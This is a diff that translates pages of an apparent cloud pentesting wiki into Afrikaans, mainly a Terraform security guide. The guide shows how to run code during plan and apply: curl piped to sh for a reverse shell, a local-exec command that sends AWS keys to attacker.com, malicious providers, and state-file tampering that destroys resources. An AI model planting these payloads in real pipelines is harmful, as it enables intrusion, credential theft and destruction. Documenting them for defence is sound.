-- Bot and Abuse Protection: It's possible to enable Captcha.
+- Gebruiker Sessies: Dit is moontlik om te configureer hoe gebruiker sessies werk (tydoue, 1 sessie per gebruiker...)
+- Bot en Misbruik Beskerming: Dit is moontlik om Captcha in te skakel.
 
-### SMTP Settings
+### SMTP Instellings
 
-It's possible to set an SMTP to send emails.
+Dit is moontlik om 'n SMTP in te stel om e-posse te stuur.
 
-### Advanced Settings
+### Gevorderde Instellings
 
-- Set expire time to access tokens (3600 by default)
-- Set to detect and revoke potentially compromised refresh tokens and timeout
-- MFA: Indicate how many MFA factors can be enrolled at once per user (10 by default)
-- Max Direct Database Connections: Max number of connections used to auth (10 by default)
-- Max Request Duration: Maximum time allowed for an Auth request to last (10s by default)
+- Stel vervaldatum in vir toegangstokens (3600 standaard)
+- Stel in om potensieel gecompromitteerde verfris tokens te detecteer en in te trek
+- MFA: Dui aan hoeveel MFA faktore op een slag per gebruiker geregistreer kan word (10 standaard)
+- Maksimum Direkte Databasis Verbindinge: Maksimum aantal verbindings wat gebruik word om te autentiseer (10 standaard)
+- Maksimum Versoek Duur: Maksimum tyd wat toegelaat word vir 'n Auth versoek om te duur (10s standaard)
 
-## Storage
+## Berging
 
 > [!TIP]
-> Supabase allows **to store files** and make them accesible over a URL (it uses S3 buckets).
+> Supabase laat **toe om lêers te stoor** en dit oor 'n URL beskikbaar te stel (dit gebruik S3 emmers).
 
-- Set the upload file size limit (default is 50MB)
-- The S3 connection is given with a URL like: `https://jnanozjdybtpqgcwhdiz.supabase.co/storage/v1/s3`
-- It's possible to **request S3 access key** that are formed by an `access key ID` (e.g. `a37d96544d82ba90057e0e06131d0a7b`) and a `secret access key` (e.g. `58420818223133077c2cec6712a4f909aec93b4daeedae205aa8e30d5a860628`)
+- Stel die opgelaaide lêergrootte limiet in (standaard is 50MB)
+- Die S3 verbinding word gegee met 'n URL soos: `https://jnanozjdybtpqgcwhdiz.supabase.co/storage/v1/s3`
+- Dit is moontlik om **S3 toegangssleutel** aan te vra wat gevorm word deur 'n `access key ID` (bv. `a37d96544d82ba90057e0e06131d0a7b`) en 'n `secret access key` (bv. `58420818223133077c2cec6712a4f909aec93b4daeedae205aa8e30d5a860628`)
 
-## Edge Functions
+## Edge Funksies
 
-It's possible to **store secrets** in supabase also which will be **accessible by edge functions** (the can be created and deleted from the web, but it's not possible to access their value directly).
+Dit is moontlik om **geheime** in supabase te stoor wat ook **toeganklik sal wees deur edge funksies** (hulle kan van die web geskep en verwyder word, maar dit is nie moontlik om hul waarde direk te benader nie).
 
 {{#include ../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/terraform-security.md b/src/pentesting-ci-cd/terraform-security.md
index 09b875ff2..2f5c733e7 100644
--- a/src/pentesting-ci-cd/terraform-security.md
+++ b/src/pentesting-ci-cd/terraform-security.md
@@ -6,303 +6,273 @@
 
 [From the docs:](https://developer.hashicorp.com/terraform/intro)
 
-HashiCorp Terraform is an **infrastructure as code tool** that lets you define both **cloud and on-prem resources** in human-readable configuration files that you can version, reuse, and share. You can then use a consistent workflow to provision and manage all of your infrastructure throughout its lifecycle. Terraform can manage low-level components like compute, storage, and networking resources, as well as high-level components like DNS entries and SaaS features.
+HashiCorp Terraform is 'n **infrastruktuur as kode hulpmiddel** wat jou toelaat om beide **cloud en op-prem hulpbronne** in menslike leesbare konfigurasie lêers te definieer wat jy kan weergawe, hergebruik en deel. Jy kan dan 'n konsekwente werksvloei gebruik om al jou infrastruktuur deur sy lewensiklus te voorsien en te bestuur. Terraform kan lae-vlak komponente soos rekenaar, stoor en netwerk hulpbronne bestuur, sowel as hoë-vlak komponente soos DNS inskrywings en SaaS funksies.
 
 #### How does Terraform work?
 
-Terraform creates and manages resources on cloud platforms and other services through their application programming interfaces (APIs). Providers enable Terraform to work with virtually any platform or service with an accessible API.
+Terraform skep en bestuur hulpbronne op cloud platforms en ander dienste deur hul toepassingsprogrammeringsinterfaces (API's). Verskaffers stel Terraform in staat om met feitlik enige platform of diens met 'n toeganklike API te werk.
 
 ![](<../images/image (177).png>)
 
-HashiCorp and the Terraform community have already written **more than 1700 providers** to manage thousands of different types of resources and services, and this number continues to grow. You can find all publicly available providers on the [Terraform Registry](https://registry.terraform.io/), including Amazon Web Services (AWS), Azure, Google Cloud Platform (GCP), Kubernetes, Helm, GitHub, Splunk, DataDog, and many more.
+HashiCorp en die Terraform gemeenskap het reeds **meer as 1700 verskaffers** geskryf om duisende verskillende tipes hulpbronne en dienste te bestuur, en hierdie getal hou aan om te groei. Jy kan al die publiek beskikbare verskaffers op die [Terraform Registry](https://registry.terraform.io/) vind, insluitend Amazon Web Services (AWS), Azure, Google Cloud Platform (GCP), Kubernetes, Helm, GitHub, Splunk, DataDog, en nog baie meer.
 
-The core Terraform workflow consists of three stages:
+Die kern Terraform werksvloei bestaan uit drie fases:
 
-- **Write:** You define resources, which may be across multiple cloud providers and services. For example, you might create a configuration to deploy an application on virtual machines in a Virtual Private Cloud (VPC) network with security groups and a load balancer.
-- **Plan:** Terraform creates an execution plan describing the infrastructure it will create, update, or destroy based on the existing infrastructure and your configuration.
-- **Apply:** On approval, Terraform performs the proposed operations in the correct order, respecting any resource dependencies. For example, if you update the properties of a VPC and change the number of virtual machines in that VPC, Terraform will recreate the VPC before scaling the virtual machines.
+- **Write:** Jy definieer hulpbronne, wat oor verskeie cloud verskaffers en dienste mag wees. Byvoorbeeld, jy mag 'n konfigurasie skep om 'n toepassing op virtuele masjiene in 'n Virtuele Privaat Cloud (VPC) netwerk met sekuriteitsgroepe en 'n laaibalans te ontplooi.
+- **Plan:** Terraform skep 'n uitvoeringsplan wat die infrastruktuur beskryf wat dit sal skep, opdateer of vernietig gebaseer op die bestaande infrastruktuur en jou konfigurasie.
+- **Apply:** Op goedkeuring, voer Terraform die voorgestelde operasies in die korrekte volgorde uit, terwyl dit enige hulpbron afhanklikhede respekteer. Byvoorbeeld, as jy die eienskappe van 'n VPC opdateer en die aantal virtuele masjiene in daardie VPC verander, sal Terraform die VPC weer skep voordat dit die virtuele masjiene skaal.
 
 ![](<../images/image (215).png>)
 
 ### Terraform Lab
 
-Just install terraform in your computer.
+Installeer eenvoudig terraform op jou rekenaar.
 
-Here you have a [guide](https://learn.hashicorp.com/tutorials/terraform/install-cli) and here you have the [best way to download terraform](https://www.terraform.io/downloads).
+Hier het jy 'n [gids](https://learn.hashicorp.com/tutorials/terraform/install-cli) en hier het jy die [beste manier om terraform af te laai](https://www.terraform.io/downloads).
 
 ## RCE in Terraform
 
-Terraform **doesn't have a platform exposing a web page or a network service** we can enumerate, therefore, the only way to compromise terraform is to **be able to add/modify terraform configuration files**.
+Terraform **het nie 'n platform wat 'n webblad of 'n netwerkdiens blootstel** wat ons kan opnoem nie, daarom is die enigste manier om terraform te kompromitteer om **in staat te wees om terraform konfigurasie lêers by te voeg/wysig**.
 
-However, terraform is a **very sensitive component** to compromise because it will have **privileged access** to different locations so it can work properly.
+Egter, terraform is 'n **baie sensitiewe komponent** om te kompromitteer omdat dit **bevoorregte toegang** tot verskillende plekke sal hê sodat dit behoorlik kan werk.
 
-The main way for an attacker to be able to compromise the system where terraform is running is to **compromise the repository that stores terraform configurations**, because at some point they are going to be **interpreted**.
+Die hoof manier vir 'n aanvaller om in staat te wees om die stelsel waar terraform loop te kompromitteer, is om **die repo te kompromitteer wat terraform konfigurasies stoor**, omdat dit op 'n stadium **geïterpreteer** gaan word.
 
-Actually, there are solutions out there that **execute terraform plan/apply automatically after a PR** is created, such as **Atlantis**:
+Werklik, daar is oplossings daar buite wat **automaties terraform plan/apply uitvoer nadat 'n PR** geskep is, soos **Atlantis**:
 
 {{#ref}}
 atlantis-security.md
 {{#endref}}
 
-If you are able to compromise a terraform file there are different ways you can perform RCE when someone executed `terraform plan` or `terraform apply`.
+As jy in staat is om 'n terraform lêer te kompromitteer, is daar verskillende maniere waarop jy RCE kan uitvoer wanneer iemand `terraform plan` of `terraform apply` uitvoer.
 
 ### Terraform plan
 
-Terraform plan is the **most used command** in terraform and developers/solutions using terraform call it all the time, so the **easiest way to get RCE** is to make sure you poison a terraform config file that will execute arbitrary commands in a `terraform plan`.
+Terraform plan is die **mees gebruikte opdrag** in terraform en ontwikkelaars/oplossings wat terraform gebruik, noem dit heeltyd, so die **gemaklikste manier om RCE te kry** is om te verseker dat jy 'n terraform konfigurasie lêer vergiftig wat arbitrêre opdragte in 'n `terraform plan` sal uitvoer.
 
 **Using an external provider**
 
-Terraform offers the [`external` provider](https://registry.terraform.io/providers/hashicorp/external/latest/docs) which provides a way to interface between Terraform and external programs. You can use the `external` data source to run arbitrary code during a `plan`.
-
-Injecting in a terraform config file something like the following will execute a rev shell when executing `terraform plan`:
+Terraform bied die [`external` provider](https://registry.terraform.io/providers/hashicorp/external/latest/docs) wat 'n manier bied om tussen Terraform en eksterne programme te kommunikeer. Jy kan die `external` data bron gebruik om arbitrêre kode tydens 'n `plan` uit te voer.
 
+Om iets soos die volgende in 'n terraform konfigurasie lêer in te voeg, sal 'n rev shell uitvoer wanneer jy `terraform plan` uitvoer:
 ```javascript
 data "external" "example" {
-  program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
+program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"]
 }
 ```
+**Gebruik van 'n pasgemaakte verskaffer**
 
-**Using a custom provider**
-
-An attacker could send a [custom provider](https://learn.hashicorp.com/tutorials/terraform/provider-setup) to the [Terraform Registry](https://registry.terraform.io/) and then add it to the Terraform code in a feature branch ([example from here](https://alex.kaskaso.li/post/terraform-plan-rce)):
-
+'n Aanvaller kan 'n [pasgemaakte verskaffer](https://learn.hashicorp.com/tutorials/terraform/provider-setup) na die [Terraform Registry](https://registry.terraform.io/) stuur en dit dan by die Terraform-kode in 'n kenmerk tak voeg ([voorbeeld hier](https://alex.kaskaso.li/post/terraform-plan-rce)):
 ```javascript
- terraform {
-        required_providers {
-            evil = {
-                source  = "evil/evil"
-                    version = "1.0"
-            }
-        }
-    }
+terraform {
+required_providers {
+evil = {
+source  = "evil/evil"
+version = "1.0"
+}
+}
+}
 
 provider "evil" {}
 ```
+Die verskaffer word afgelaai in die `init` en sal die kwaadwillige kode uitvoer wanneer `plan` uitgevoer word.
 
-The provider is downloaded in the `init` and will run the malicious code when `plan` is executed
+Jy kan 'n voorbeeld vind in [https://github.com/rung/terraform-provider-cmdexec](https://github.com/rung/terraform-provider-cmdexec)
 
-You can find an example in [https://github.com/rung/terraform-provider-cmdexec](https://github.com/rung/terraform-provider-cmdexec)
+**Gebruik 'n eksterne verwysing**
 
-**Using an external reference**
-
-Both mentioned options are useful but not very stealthy (the second is more stealthy but more complex than the first one). You can perform this attack even in a **stealthier way**, by following this suggestions:
-
-- Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell:
+Albei genoemde opsies is nuttig, maar nie baie stil nie (die tweede is stilser, maar meer kompleks as die eerste een). Jy kan hierdie aanval selfs op 'n **stilser manier** uitvoer deur hierdie voorstelle te volg:
 
+- In plaas daarvan om die rev shell direk in die terraform-lêer by te voeg, kan jy **'n eksterne hulpbron laai** wat die rev shell bevat:
 ```javascript
 module "not_rev_shell" {
-  source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
+source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules"
 }
 ```
-
 You can find the rev shell code in [https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules](https://github.com/carlospolop/terraform_external_module_rev_shell/tree/main/modules)
 
-- In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
+- In die eksterne hulpbron, gebruik die **ref** kenmerk om die **terraform rev shell kode in 'n tak** binne die repo te verberg, iets soos: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b`
 
 ### Terraform Apply
 
-Terraform apply will be executed to apply all the changes, you can also abuse it to obtain RCE injecting **a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\
-You just need to make sure some payload like the following ones ends in the `main.tf` file:
-
+Terraform apply sal uitgevoer word om al die veranderinge toe te pas, jy kan dit ook misbruik om RCE te verkry deur **'n kwaadwillige Terraform-lêer met** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\
+Jy moet net seker maak dat 'n payload soos die volgende in die `main.tf` lêer eindig:
 ```json
 // Payload 1 to just steal a secret
 resource "null_resource" "secret_stealer" {
-  provisioner "local-exec" {
-    command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
-  }
+provisioner "local-exec" {
+command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY"
+}
 }
 
 // Payload 2 to get a rev shell
 resource "null_resource" "rev_shell" {
-  provisioner "local-exec" {
-    command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
-  }
+provisioner "local-exec" {
+command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'"
+}
 }
 ```
-
-Follow the **suggestions from the previous technique** the perform this attack in a **stealthier way using external references**.
+Volg die **voorstelle van die vorige tegniek** om hierdie aanval op 'n **stealthier manier met eksterne verwysings** uit te voer.
 
 ## Secrets Dumps
 
-You can have **secret values used by terraform dumped** running `terraform apply` by adding to the terraform file something like:
-
+Jy kan **geheime waardes wat deur terraform gebruik word, laat dump** deur `terraform apply` te loop deur iets soos die volgende aan die terraform-lêer toe te voeg:
 ```json
 output "dotoken" {
-  value = nonsensitive(var.do_token)
+value = nonsensitive(var.do_token)
 }
 ```
+## Misbruik van Terraform Toestand Lêers
 
-## Abusing Terraform State Files
+In die geval dat jy skryfreëls oor terraform toestand lêers het, maar nie die terraform kode kan verander nie, [**hierdie navorsing**](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) bied 'n paar interessante opsies om voordeel te trek uit die lêer:
 
-In case you have write access over terraform state files but cannot change the terraform code, [**this research**](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/) gives some interesting options to take advantage of the file:
+### Verwydering van hulpbronne <a href="#deleting-resources" id="deleting-resources"></a>
 
-### Deleting resources <a href="#deleting-resources" id="deleting-resources"></a>
+Daar is 2 maniere om hulpbronne te vernietig:
 
-There are 2 ways to destroy resources:
-
-1. **Insert a resource with a random name into the state file pointing to the real resource to destroy**
-
-Because terraform will see that the resource shouldn't exit, it'll destroy it (following the real resource ID indicated). Example from the previous page:
+1. **Voeg 'n hulpbron met 'n ewekansige naam by die toestand lêer wat na die werklike hulpbron verwys om te vernietig**
 
+Omdat terraform sal sien dat die hulpbron nie behoort te bestaan nie, sal dit dit vernietig (volgens die werklike hulpbron ID wat aangedui word). Voorbeeld van die vorige bladsy:
 ```json
 {
-  "mode": "managed",
-  "type": "aws_instance",
-  "name": "example",
-  "provider": "provider[\"registry.terraform.io/hashicorp/aws\"]",
-  "instances": [
-    {
-      "attributes": {
-        "id": "i-1234567890abcdefg"
-      }
-    }
-  ]
+"mode": "managed",
+"type": "aws_instance",
+"name": "example",
+"provider": "provider[\"registry.terraform.io/hashicorp/aws\"]",
+"instances": [
+{
+"attributes": {
+"id": "i-1234567890abcdefg"
+}
+}
+]
 },
 ```
+2. **Wysig die hulpbron om te verwyder op 'n manier dat dit nie moontlik is om op te dateer nie (sodat dit verwyder en weer geskep sal word)**
 
-2. **Modify the resource to delete in a way that it's not possible to update (so it'll be deleted a recreated)**
-
-For an EC2 instance, modifying the type of the instance is enough to make terraform delete a recreate it.
+Vir 'n EC2-instantie is dit genoeg om die tipe van die instantie te wysig sodat terraform dit verwyder en weer skep.
 
 ### RCE
 
-It's also possible to [create a custom provider](https://developer.hashicorp.com/terraform/tutorials/providers-plugin-framework/providers-plugin-framework-provider) and just replace one of the providers in the terraform state file for the malicious one or add an empty resource with the malicious provider. Example from the original research:
-
+Dit is ook moontlik om [n pasgemaakte verskaffer te skep](https://developer.hashicorp.com/terraform/tutorials/providers-plugin-framework/providers-plugin-framework-provider) en net een van die verskaffers in die terraform toestandlêer te vervang met die kwaadwillige een of 'n leë hulpbron met die kwaadwillige verskaffer by te voeg. Voorbeeld uit die oorspronklike navorsing:
 ```json
 "resources": [
 {
-  "mode": "managed",
-  "type": "scaffolding_example",
-  "name": "example",
-  "provider": "provider[\"registry.terraform.io/dagrz/terrarizer\"]",
-  "instances": [
+"mode": "managed",
+"type": "scaffolding_example",
+"name": "example",
+"provider": "provider[\"registry.terraform.io/dagrz/terrarizer\"]",
+"instances": [
 
-  ]
+]
 },
 ```
+### Vervang geblacklisted verskaffer
 
-### Replace blacklisted provider
-
-In case you encounter a situation where `hashicorp/external` was blacklisted, you can re-implement the `external` provider by doing the following. Note: We use a fork of external provider published by https://registry.terraform.io/providers/nazarewk/external/latest. You can publish your own fork or re-implementation as well.
-
+In die geval dat jy 'n situasie teëkom waar `hashicorp/external` geblacklisted was, kan jy die `external` verskaffer herimplementer deur die volgende te doen. Let wel: Ons gebruik 'n fork van die eksterne verskaffer gepubliseer deur https://registry.terraform.io/providers/nazarewk/external/latest. Jy kan jou eie fork of herimplementering ook publiseer.
 ```terraform
 terraform {
-  required_providers {
-    external = {
-      source  = "nazarewk/external"
-      version = "3.0.0"
-    }
-  }
+required_providers {
+external = {
+source  = "nazarewk/external"
+version = "3.0.0"
+}
+}
 }
 ```
-
-Then you can use `external` as per normal.
-
+Dan kan jy `external` soos normaal gebruik.
 ```terraform
 data "external" "example" {
-  program = ["sh", "-c", "whoami"]
+program = ["sh", "-c", "whoami"]
 }
 ```
+## Outomatiese Oudit Gereedskap
 
-## Automatic Audit Tools
+### [**Snyk Infrastruktur as Kode (IaC)**](https://snyk.io/product/infrastructure-as-code-security/)
 
-### [**Snyk Infrastructure as Code (IaC)**](https://snyk.io/product/infrastructure-as-code-security/)
-
-Snyk offers a comprehensive Infrastructure as Code (IaC) scanning solution that detects vulnerabilities and misconfigurations in Terraform, CloudFormation, Kubernetes, and other IaC formats.
-
-- **Features:**
-  - Real-time scanning for security vulnerabilities and compliance issues.
-  - Integration with version control systems (GitHub, GitLab, Bitbucket).
-  - Automated fix pull requests.
-  - Detailed remediation advice.
-- **Sign Up:** Create an account on [Snyk](https://snyk.io/).
+Snyk bied 'n omvattende Infrastruktur as Kode (IaC) skandeeroplossing wat kwesbaarhede en verkeerde konfigurasies in Terraform, CloudFormation, Kubernetes, en ander IaC formate opspoor.
 
+- **Kenmerke:**
+- Regs-tijd skandering vir sekuriteitskwesbaarhede en nakomingskwessies.
+- Integrasie met weergawebeheer stelsels (GitHub, GitLab, Bitbucket).
+- Outomatiese regstelling trek versoeke.
+- Gedetailleerde hersteladvies.
+- **Teken In:** Skep 'n rekening op [Snyk](https://snyk.io/).
 ```bash
 brew tap snyk/tap
 brew install snyk
 snyk auth
 snyk iac test /path/to/terraform/code
 ```
-
 ### [Checkov](https://github.com/bridgecrewio/checkov) <a href="#install-checkov-from-pypi" id="install-checkov-from-pypi"></a>
 
-**Checkov** is a static code analysis tool for infrastructure as code (IaC) and also a software composition analysis (SCA) tool for images and open source packages.
+**Checkov** is 'n statiese kode analise hulpmiddel vir infrastruktuur as kode (IaC) en ook 'n sagteware samestelling analise (SCA) hulpmiddel vir beelde en oopbron pakkette.
 
-It scans cloud infrastructure provisioned using [Terraform](https://terraform.io/), [Terraform plan](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Terraform%20Plan%20Scanning.md), [Cloudformation](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Cloudformation.md), [AWS SAM](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/AWS%20SAM.md), [Kubernetes](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kubernetes.md), [Helm charts](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Helm.md), [Kustomize](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kustomize.md), [Dockerfile](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Dockerfile.md), [Serverless](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Serverless%20Framework.md), [Bicep](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Bicep.md), [OpenAPI](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/OpenAPI.md), [ARM Templates](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Azure%20ARM%20templates.md), or [OpenTofu](https://opentofu.org/) and detects security and compliance misconfigurations using graph-based scanning.
-
-It performs [Software Composition Analysis (SCA) scanning](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Sca.md) which is a scan of open source packages and images for Common Vulnerabilities and Exposures (CVEs).
+Dit skandeer wolk infrastruktuur wat voorsien is met behulp van [Terraform](https://terraform.io/), [Terraform plan](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Terraform%20Plan%20Scanning.md), [Cloudformation](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Cloudformation.md), [AWS SAM](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/AWS%20SAM.md), [Kubernetes](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kubernetes.md), [Helm charts](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Helm.md), [Kustomize](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Kustomize.md), [Dockerfile](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Dockerfile.md), [Serverless](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Serverless%20Framework.md), [Bicep](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Bicep.md), [OpenAPI](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/OpenAPI.md), [ARM Templates](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Azure%20ARM%20templates.md), of [OpenTofu](https://opentofu.org/) en detecteer sekuriteits- en nakomingsmisconfigurasies met behulp van graf-gebaseerde skandering.
 
+Dit voer [Sagteware Samestelling Analise (SCA) skandering](https://github.com/bridgecrewio/checkov/blob/main/docs/7.Scan%20Examples/Sca.md) uit wat 'n skandering van oopbron pakkette en beelde vir Algemene Kw vulnerabilities en Blootstellings (CVEs) is.
 ```bash
 pip install checkov
 checkov -d /path/to/folder
 ```
-
 ### [terraform-compliance](https://github.com/terraform-compliance/cli)
 
-From the [**docs**](https://github.com/terraform-compliance/cli): `terraform-compliance` is a lightweight, security and compliance focused test framework against terraform to enable negative testing capability for your infrastructure-as-code.
+From the [**docs**](https://github.com/terraform-compliance/cli): `terraform-compliance` is 'n liggewig, sekuriteit en nakoming gefokusde toetsraamwerk teenoor terraform om negatiewe toetsing vermoë vir jou infrastruktuur-as-kode moontlik te maak.
 
-- **compliance:** Ensure the implemented code is following security standards, your own custom standards
-- **behaviour driven development:** We have BDD for nearly everything, why not for IaC ?
-- **portable:** just install it from `pip` or run it via `docker`. See [Installation](https://terraform-compliance.com/pages/installation/)
-- **pre-deploy:** it validates your code before it is deployed
-- **easy to integrate:** it can run in your pipeline (or in git hooks) to ensure all deployments are validated.
-- **segregation of duty:** you can keep your tests in a different repository where a separate team is responsible.
+- **compliance:** Verseker dat die geïmplementeerde kode sekuriteitsstandaarde en jou eie pasgemaakte standaarde volg
+- **behaviour driven development:** Ons het BDD vir byna alles, hoekom nie vir IaC nie?
+- **portable:** installeer dit net vanaf `pip` of hardloop dit via `docker`. Sien [Installation](https://terraform-compliance.com/pages/installation/)
+- **pre-deploy:** dit valideer jou kode voordat dit ontplooi word
+- **easy to integrate:** dit kan in jou pyplyn (of in git hooks) hardloop om te verseker dat alle ontplooiings gevalideer word.
+- **segregation of duty:** jy kan jou toetse in 'n ander repository hou waar 'n aparte span verantwoordelik is.
 
 > [!NOTE]
-> Unfortunately if the code is using some providers you don't have access to you won't be able to perform the `terraform plan` and run this tool.
-
+> Ongelukkig, as die kode sommige verskaffers gebruik waartoe jy nie toegang het nie, sal jy nie in staat wees om die `terraform plan` uit te voer en hierdie hulpmiddel te gebruik nie.
 ```bash
 pip install terraform-compliance
 terraform plan -out=plan.out
 terraform-compliance -f /path/to/folder
 ```
-
 ### [tfsec](https://github.com/aquasecurity/tfsec)
 
-From the [**docs**](https://github.com/aquasecurity/tfsec): tfsec uses static analysis of your terraform code to spot potential misconfigurations.
-
-- ☁️ Checks for misconfigurations across all major (and some minor) cloud providers
-- ⛔ Hundreds of built-in rules
-- 🪆 Scans modules (local and remote)
-- ➕ Evaluates HCL expressions as well as literal values
-- ↪️ Evaluates Terraform functions e.g. `concat()`
-- 🔗 Evaluates relationships between Terraform resources
-- 🧰 Compatible with the Terraform CDK
-- 🙅 Applies (and embellishes) user-defined Rego policies
-- 📃 Supports multiple output formats: lovely (default), JSON, SARIF, CSV, CheckStyle, JUnit, text, Gif.
-- 🛠️ Configurable (via CLI flags and/or config file)
-- ⚡ Very fast, capable of quickly scanning huge repositories
+From the [**docs**](https://github.com/aquasecurity/tfsec): tfsec gebruik statiese analise van jou terraform kode om potensiële miskonfigurasies op te spoor.
 
+- ☁️ Kontroleer vir miskonfigurasies oor alle groot (en sommige klein) wolkverskaffers
+- ⛔ Honderde ingeboude reëls
+- 🪆 Skandeer modules (plaaslik en afstand)
+- ➕ Evalueer HCL-uitdrukkings sowel as letterlike waardes
+- ↪️ Evalueer Terraform funksies bv. `concat()`
+- 🔗 Evalueer verhoudings tussen Terraform hulpbronne
+- 🧰 Kompatibel met die Terraform CDK
+- 🙅 Pas (en versier) gebruiker-gedefinieerde Rego-beleide toe
+- 📃 Ondersteun verskeie uitvoerformate: pragtig (verstek), JSON, SARIF, CSV, CheckStyle, JUnit, teks, Gif.
+- 🛠️ Konfigureerbaar (via CLI-vlaggies en/of konfigurasie lêer)
+- ⚡ Baie vinnig, in staat om vinnig enorme repositories te skandeer
 ```bash
 brew install tfsec
 tfsec /path/to/folder
 ```
-
 ### [KICKS](https://github.com/Checkmarx/kics)
 
-Find security vulnerabilities, compliance issues, and infrastructure misconfigurations early in the development cycle of your infrastructure-as-code with **KICS** by Checkmarx.
-
-**KICS** stands for **K**eeping **I**nfrastructure as **C**ode **S**ecure, it is open source and is a must-have for any cloud native project.
+Vind sekuriteitskwesbaarhede, nakomingskwessies en infrastruktuur miskonfigurasies vroeg in die ontwikkelingsiklus van jou infrastruktuur-as-kode met **KICS** deur Checkmarx.
 
+**KICS** staan vir **K**eeping **I**nfrastructure as **C**ode **S**ecure, dit is oopbron en is 'n moet-hê vir enige wolk-natiewe projek.
 ```bash
 docker run -t -v $(pwd):/path checkmarx/kics:latest scan -p /path -o "/path/"
 ```
-
 ### [Terrascan](https://github.com/tenable/terrascan)
 
-From the [**docs**](https://github.com/tenable/terrascan): Terrascan is a static code analyzer for Infrastructure as Code. Terrascan allows you to:
-
-- Seamlessly scan infrastructure as code for misconfigurations.
-- Monitor provisioned cloud infrastructure for configuration changes that introduce posture drift, and enables reverting to a secure posture.
-- Detect security vulnerabilities and compliance violations.
-- Mitigate risks before provisioning cloud native infrastructure.
-- Offers flexibility to run locally or integrate with your CI\CD.
+Van die [**docs**](https://github.com/tenable/terrascan): Terrascan is 'n statiese kode-analiseerder vir Infrastruktur as Kode. Terrascan stel jou in staat om:
 
+- Naadloos infrastruktuur as kode te skandeer vir verkeerde konfigurasies.
+- Geprovisioneerde wolkinfrastruktuur te monitor vir konfigurasiewijzigings wat posisie-afwykings inbring, en stel jou in staat om na 'n veilige posisie terug te keer.
+- Sekuriteitskwesbaarhede en nakomingsoortredings te ontdek.
+- Risiko's te verminder voordat wolk-natiewe infrastruktuur geprovisioneer word.
+- Bied buigsaamheid om plaaslik te loop of te integreer met jou CI\CD.
 ```bash
 brew install terrascan
 ```
-
-## References
+## Verwysings
 
 - [Atlantis Security](atlantis-security.md)
 - [https://alex.kaskaso.li/post/terraform-plan-rce](https://alex.kaskaso.li/post/terraform-plan-rce)
@@ -310,7 +280,3 @@ brew install terrascan
 - [https://blog.plerion.com/hacking-terraform-state-privilege-escalation/](https://blog.plerion.com/hacking-terraform-state-privilege-escalation/)
 
 {{#include ../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/todo.md b/src/pentesting-ci-cd/todo.md
index 63a3bb5c8..0d9f6b765 100644
--- a/src/pentesting-ci-cd/todo.md
+++ b/src/pentesting-ci-cd/todo.md
@@ -2,7 +2,7 @@
 
 {{#include ../banners/hacktricks-training.md}}
 
-Github PRs are welcome explaining how to (ab)use those platforms from an attacker perspective
+Github PRs is welkom wat verduidelik hoe om (mis)bruik te maak van daardie platforms vanuit 'n aanvaller se perspektief
 
 - Drone
 - TeamCity
@@ -11,10 +11,6 @@ Github PRs are welcome explaining how to (ab)use those platforms from an attacke
 - Rancher
 - Mesosphere
 - Radicle
-- Any other CI/CD platform...
+- Enige ander CI/CD platform...
 
 {{#include ../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/travisci-security/README.md b/src/pentesting-ci-cd/travisci-security/README.md
index cff623392..89c721c72 100644
--- a/src/pentesting-ci-cd/travisci-security/README.md
+++ b/src/pentesting-ci-cd/travisci-security/README.md
@@ -1,69 +1,65 @@
-# TravisCI Security
+# TravisCI Veiligheid
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## What is TravisCI
+## Wat is TravisCI
 
